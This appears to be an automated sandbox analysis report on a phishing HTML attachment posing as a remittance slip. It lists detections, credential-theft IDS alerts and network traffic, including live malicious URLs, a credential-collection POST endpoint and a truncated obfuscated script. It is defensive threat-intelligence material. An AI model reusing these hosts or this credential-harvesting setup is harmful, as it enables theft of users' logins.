Edit tour

Windows Analysis Report
Remittance_Slip_kodiakbp.com.htm

Overview

General Information

Sample name:	Remittance_Slip_kodiakbp.com.htm
Analysis ID:	1623886
MD5:	1d067101a0eb8ccb96419f870ca143df
SHA1:	372ce919e5eedb1244aeeb160a7015dff081d664
SHA256:	c67e7e175dbc8459ca60579a637505a806b4ae5474056471f26317381d24485a
Infos:

Detection

HTMLPhisher

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

HTML page contains obfuscated javascript

Suspicious Javascript code found in HTML file

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Remittance_Slip_kodiakbp.com.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T17:13:18.429973+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49773	63.250.38.198	443	TCP
2025-02-25T17:13:40.554566+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49777	63.250.38.198	443	TCP
2025-02-25T17:14:12.759868+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	49952	63.250.38.198	443	TCP
2025-02-25T17:14:31.428709+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50048	63.250.38.198	443	TCP
2025-02-25T17:14:58.539039+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50050	63.250.38.198	443	TCP
2025-02-25T17:15:24.742310+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50052	63.250.38.198	443	TCP
2025-02-25T17:15:44.920156+0100	2847819	1	Successful Credential Theft Detected	192.168.2.4	50054	63.250.38.198	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://pxvbtech.store/xtk/xls/x1t2k.js	Avira URL Cloud: Label: malware
Source: https://pxvbtech.store/xtk/xls/login.php	Avira URL Cloud: Label: malware

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 1.5.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.6.pages.csv, type: HTML

Detected javascript redirector / loader

Source: Remittance_Slip_kodiakbp.com.htm

HTTP Parser: Low number of body elements: 0

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

Tab title: Remittance_Slip_kodiakbp.com.htm

HTML page contains obfuscated javascript

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: (function(_0x2a8bb1,_0x3065a0){function _0xc27043(_0x170223,_0x45126c,_0x476351,_0x58ad66,_

Suspicious Javascript code found in HTML file

Source: Remittance_Slip_kodiakbp.com.htm

HTTP Parser: document.write

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: Remittance_Slip_kodiakbp.com.htm

HTTP Parser: Base64 decoded: "')-T|2x7G:J#/A$x7Q=U0d9.Da7_U$ VZ$(*>;U4^P$3+50U%#ohWRU'0's+-hC$I0G0,h$(-2fP'?^" t6)vD"k7W(bW|*vI<P'(K+> V8>o}C S= 10x4C+c+,cg-10x3/^; 2#h}))>gP'WL9Y x$:>|#_?4 k}1'TB4=/\39H T7#...

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: <input type="password" .../> found

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49773 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49777 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50050 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50048 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50054 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:50052 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49952 -> 63.250.38.198:443

Source: global traffic

TCP traffic: 192.168.2.4:49769 -> 185.174.100.76:8162

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 199.232.196.193 199.232.196.193
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xtk/xls/x1t2k.js HTTP/1.1Host: pxvbtech.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/x1t2k.js HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: linxcoded.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=i966g8f6nfjfq5q6vdmpbndavc

Source: global traffic	DNS traffic detected: DNS query: pxvbtech.store
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: _8162._https.server1.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown

HTTP traffic detected: POST /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveContent-Length: 57sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_86.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_83.2.dr, chromecache_86.2.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_83.2.dr, chromecache_86.2.dr	String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: chromecache_81.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_81.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

System Summary

HTML document with suspicious name

Source: Name includes: Remittance_Slip_kodiakbp.com.htm

Initial sample: remit

Source: classification engine

Classification label: mal96.phis.winHTM@26/26@24/13

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Remittance_Slip_kodiakbp.com.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
